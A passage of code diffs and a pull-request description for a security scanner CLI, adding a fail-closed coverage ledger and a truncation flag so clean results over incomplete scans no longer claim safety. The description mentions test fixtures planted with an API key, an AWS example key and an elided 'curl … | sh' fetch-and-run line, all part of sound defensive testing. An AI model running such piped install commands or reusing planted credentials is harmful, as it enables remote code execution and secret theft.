+export default fs;

--- a/src/hardening/tracked-fs.ts
+++ b/src/hardening/tracked-fs.ts
@@ -1,7 +1,7 @@
 /**
  * `fs/promises` namespace with read attribution for the coverage ledger.
  *
- * The scanner reads the target through 153 separate `fs.readFile` call sites
+ * The scanner reads the target through 151 separate `fs.readFile` call sites
  * plus a spread of `stat` / `readdir` / `access` calls. Instrumenting each one
  * would be fail-OPEN: a site missed in the sweep would let its check claim
  * coverage it never had, which is the exact defect the ledger exists to fix.

--- a/src/lifecycle/assembly-scanner.ts
+++ b/src/lifecycle/assembly-scanner.ts
@@ -16,7 +16,12 @@
  *   attention window.
  */
 
-import * as fs from 'fs/promises';
+// Tracked `fs` so the reads this module performs on behalf of
+// `checkContextLifecycle` are attributed to the coverage ledger. Reading
+// through the untracked namespace made the lifecycle category report
+// `filesRead: 0` after reading 177 files, which the renderer then showed as
+// 'no such surface here' — an instrumentation hole rendered as reassurance.
+import { fs } from '../hardening/tracked-fs';
 import * as path from 'path';
 import type {
   SecurityFinding,

--- a/src/nanomind-core/orchestrate.ts
+++ b/src/nanomind-core/orchestrate.ts
@@ -48,6 +48,13 @@ export interface OrchestrationResult {
   mergedFindings: SecurityFinding[];
   nanomindUsed: boolean;
   compiledArtifacts: number;
+  /**
+   * True when `compiledArtifacts` is the 200-file cap rather than a count of
+   * the tree. The CLI prints this number as "N files analyzed", so without
+   * the flag a capped 528-file repo and a complete 200-file one render
+   * identically.
+   */
+  compileSetTruncated: boolean;
   /** Compact per-artifact summaries (skills / MCPs / SOULs / A2A cards).
    *  Empty when NanoMind is unavailable or only source code was scanned. */
   artifactSummaries: ArtifactSummary[];
@@ -148,6 +155,10 @@ export async function orchestrateNanoMind(
       mergedFindings: [...existingFindings],
       nanomindUsed: false,
       compiledArtifacts: 0,
+      // The semantic pass did not run at all, so nothing was capped. `false`
+      // here means "not truncated", not "complete" — `compiledArtifacts: 0`
+      // already says the layer contributed no coverage.
+      compileSetTruncated: false,
       artifactSummaries: [],
       newSemanticFindings: 0,
       integrityStatus: 'SKIPPED',
@@ -196,6 +207,7 @@ export async function orchestrateNanoMind(
       mergedFindings: nmResult.mergedFindings,
       nanomindUsed: nmResult.nanomindAvailable,
       compiledArtifacts: nmResult.compiledArtifacts,
+      compileSetTruncated: nmResult.compileSetTruncated,
       artifactSummaries: nmResult.artifactSummaries,
       newSemanticFindings: newFindings,
       integrityStatus: nmResult.integrityStatus,
@@ -328,6 +340,10 @@ export async function orchestrateNanoMind(
       mergedFindings: [...existingFindings],
       nanomindUsed: false,
       compiledArtifacts: 0,
+      // The semantic pass did not run at all, so nothing was capped. `false`
+      // here means "not truncated", not "complete" — `compiledArtifacts: 0`
+      // already says the layer contributed no coverage.
+      compileSetTruncated: false,
       artifactSummaries: [],
       newSemanticFindings: 0,
       integrityStatus: 'UNAVAILABLE',

--- a/src/nanomind-core/orchestrate.ts
+++ b/src/nanomind-core/orchestrate.ts
@@ -51,7 +51,7 @@ export interface OrchestrationResult {
   /**
    * True when `compiledArtifacts` is the 200-file cap rather than a count of
    * the tree. The CLI prints this number as "N files analyzed", so without
-   * the flag a capped 528-file repo and a complete 200-file one render
+   * the flag a capped 529-file repo and a complete 200-file one render
    * identically.
    */
   compileSetTruncated: boolean;

--- a/src/nanomind-core/scanner-bridge.ts
+++ b/src/nanomind-core/scanner-bridge.ts
@@ -133,6 +133,15 @@ export interface NanoMindScanResult {
   nanomindAvailable: boolean;
   /** Every compiled artifact, for the --nanomind analyst coverage sweep. */
   coverageCandidates: CoverageCandidate[];
+  /**
+   * True when the compile set hit `MAX_FILES_PER_SCAN` (200), so the semantic
+   * layer saw the first 200 files in walk order and nothing after them.
+   *
+   * The display layer prints `compiledArtifacts` as "N files analyzed". On a
+   * tree larger than the cap that N IS the cap, and printing it unqualified is
+   * what let a 528-file repo report "200 files analyzed" beside "(all clear)".
+   */
+  compileSetTruncated: boolean;
 }
 
 /**
@@ -162,6 +171,7 @@ export async function runNanoMindScan(
       artifactSummaries: [],
       nanomindAvailable: false,
       coverageCandidates: [],
+      compileSetTruncated: false,
     };
   }
 
@@ -172,7 +182,8 @@ export async function runNanoMindScan(
   // Step 3: Discover security-relevant files. Sweep-only documents (.html/.txt)
   // come back separately: they skip the structural pipeline entirely and are
   // appended to coverageCandidates after the compile loop (Step 4b).
-  const { compileFiles: files, sweepOnlyFiles } = await discoverFiles(targetDir);
+  const { compileFiles: files, sweepOnlyFiles, truncated: compileSetTruncated } =
+    await discoverFiles(targetDir);
 
   // Step 3b: Load project-level constraints from SOUL.md / CLAUDE.md / .opena2a/policy.*
   // When a governance file exists in the project root, its constraints cover every sibling
@@ -319,6 +330,7 @@ export async function runNanoMindScan(
     artifactSummaries,
     nanomindAvailable: nanomindUsedAtLeastOnce || useNanoMind,
     coverageCandidates,
+    compileSetTruncated,
   };
 }
 
@@ -438,6 +450,16 @@ interface DiscoveredFiles {
   /** Sweep-only files (SWEEP_ONLY_EXTENSIONS): coverage-sweep candidates the
    *  structural pipeline never touches. */
   sweepOnlyFiles: string[];
+  /**
+   * True when `MAX_FILES_PER_SCAN` stopped the walk before it ran out of tree.
+   *
+   * The walk is depth-first in `readdir` order, so on a repo larger than the
+   * cap the files that get compiled are simply the first 200 encountered and
+   * everything after is invisible to this layer. Without this flag the caller
+   * cannot tell `200 files analyzed` (a cap) from `200 files analyzed` (a
+   * whole small repo), and it printed both the same way.
+   */
+  truncated: boolean;
 }
 
 async function discoverFiles(dir: string): Promise<DiscoveredFiles> {
@@ -457,15 +479,24 @@ async function discoverFiles(dir: string): Promise<DiscoveredFiles> {
       // so a multi-GB lone file can't OOM the reader and a 0-byte file is
       // skipped exactly as in a directory scan.
       const ok = await isWithinSizeLimit(dir);
-      return { compileFiles: ok ? [dir] : [], sweepOnlyFiles: [] };
+      return { compileFiles: ok ? [dir] : [], sweepOnlyFiles: [], truncated: false };
     }
   } catch {
-    return { compileFiles: results, sweepOnlyFiles: sweepOnly }; // path vanished between resolve and scan
+    // path vanished between resolve and scan
+    return { compileFiles: results, sweepOnlyFiles: sweepOnly, truncated: false };
   }
   await walkDir(dir, results, sweepOnly, 0);
+  // `walkDir` returns the moment the compile set reaches the cap, so reaching
+  // it means the walk ended on the cap rather than on running out of tree.
+  // Reported conservatively: a repo holding exactly `MAX_FILES_PER_SCAN`
+  // eligible files is flagged truncated even though nothing was dropped. That
+  // direction understates coverage, which is the only safe direction for a
+  // coverage claim to be wrong in.
+  const truncated = results.length >= MAX_FILES_PER_SCAN;
   return {
     compileFiles: results.slice(0, MAX_FILES_PER_SCAN),
     sweepOnlyFiles: sweepOnly.slice(0, MAX_FILES_PER_SCAN),
+    truncated,
   };
 }
 

--- a/src/nanomind-core/scanner-bridge.ts
+++ b/src/nanomind-core/scanner-bridge.ts
@@ -139,7 +139,7 @@ export interface NanoMindScanResult {
    *
    * The display layer prints `compiledArtifacts` as "N files analyzed". On a
    * tree larger than the cap that N IS the cap, and printing it unqualified is
-   * what let a 528-file repo report "200 files analyzed" beside "(all clear)".
+   * what let a 529-file repo report "200 files analyzed" beside "(all clear)".
    */
   compileSetTruncated: boolean;
 }

--- a/src/ui/quick-scan-labels.ts
+++ b/src/ui/quick-scan-labels.ts
@@ -132,3 +132,18 @@ export function quickScanFollowupText(quickScan: QuickScanContext): string {
     `(adds ${QUICK_SCAN_UNEVALUATED_CATEGORIES.join(', ')}).`
   );
 }
+
+/**
+ * Left-hand labels the Observations block prints, and the column they sit in.
+ *
+ * A label of exactly `OBSERVATION_LABEL_WIDTH` leaves no separator after
+ * `padEnd` and runs straight into its value — `Not examinedA2A, CVE, …`
+ * shipped that way twice during one change. `observation-labels.test.ts`
+ * holds every entry strictly under the width so a third spelling cannot.
+ */
+export const OBSERVATION_LABEL_WIDTH = 12;
+
+export const OBSERVATION_LABELS = {
+  unexamined: 'Unexamined',
+  coverage: 'Coverage',
+} as const;


### PR DESCRIPTION
`secure` reported `100/100`, `310 static · 200 semantic · 0 skipped`, `Categories credentials, MCP, network, … (all clear)` and `No security issues detected. This library looks safe to use.` on a 529-file repo carrying a hardcoded `sk-ant-api03-…` key, an `AKIAIOSFODNN7EXAMPLE` and a `curl … | sh` — byte-identical to the same tree with nothing planted in it.

That is not a missed detection. It is a false assurance line, and it is worse than silence because it invites the reader to record a pass. `secure` is what our own pre-push gate runs, so every gated repo was getting it.

## Why it happened

All three lines came from configuration rather than from the run. `310 static` counts the keys of `TAXONOMY_MAP`. The category list seeds all 25 labels `clear: true` before it reads a finding. `0 skipped` is printed whenever no skip list is supplied, which was always. None of them consults anything that executed.

## What changed

A runtime ledger records which check methods ran and which files inside the target each one read; the Observations block and `--json` are derived from it. Categories report `examined` (a check completed and read a file, or a finding was reported), `partial` (a cap stopped the layer short of the tree), or `unexamined`.

The ledger **fails closed**: every category starts unexamined and only positive runtime evidence upgrades it, so instrumentation that is missing or bypassed understates coverage and can never overstate it. Attribution happens on a *successful* read, never on the call — counting probes for files that do not exist reported `549 files examined` on a 529-file tree, a number that cannot be true.

`fs/promises` is wrapped once rather than at each of the 151 read sites. A per-site sweep is fail-open, and a site missed in it claims coverage it never had.

Two numbers stopped being caps wearing the label of measurements. The headline `N files analyzed` was the semantic layer's 200-file compile cap, so a 529-file tree and a complete 200-file one printed identically and adding a file did not move the count. A clean result over incomplete coverage no longer claims the target looks safe.

`--json` gains a `coverage` inventory: files examined, per-method execution records, the caps that fired, the per-category rollup, and `unreachableCheckPrefixes`.

## What it does NOT do

It does not guess *why* a category read nothing. Two drafts tried to separate "the surface is absent" from "the read was not attributed" by inference and were wrong in both directions — checks that probe exact filenames never succeed on a repo that lacks them, so a real absence could not be recognised and every ordinary clean repo grew a warning it did not deserve. Only a cap that actually fired or an explicit depth skip qualifies the verdict.

No detection rule, pattern, severity or scoring weight changed. **Scan results are byte-identical to `main`** — findings, check IDs, scores and exit codes — verified across five fixtures including one that exercises the lifecycle/assembly path.

## Found on the way, filed not fixed

- **#395** — `CODEINJ-001`, `TMPPATH-001` and `ENVLEAK-001` are implemented, counted in the advertised 310, and called from nowhere. Named in `--json` as `unreachableCheckPrefixes` rather than left to be inferred.
- **#396** — the semantic layer never reads `.mjs`/`.cjs`. The same planted key scores 98 as `.mjs` and 69 as `.js`.
- **#335** — added the measured inventory of the self-scan's own false positives, including that scanning the whole repo *hides* them: the NEMO checks cap at 200 files per extension, so `scanner.ts` falls outside the slice and `secure .` reports 0 findings where `secure src/hardening` reports 3 CRITICAL.

## Review history

Two adversarial rounds. The first refuted the central claim — the ledger did not fail closed. The second found defects inside the first round's fixes, including a regression where every clean repo lost its "looks safe to use" verdict. That triggered the cut-back rule, so two mechanisms were deleted rather than repaired instead of continuing to a third round.

Residual, recorded: an aliased-function spelling can still call a check outside the ledger without failing the guard test, and the `SEMANTIC_PREFIXES` drift test catches a prefix an analyzer adds but not one left in the list that nothing emits.

## Gates

231→233 test files, 3249 passing, tsc clean, corpus release-smoke 12/0, seven mutations each killed by the test that names the property.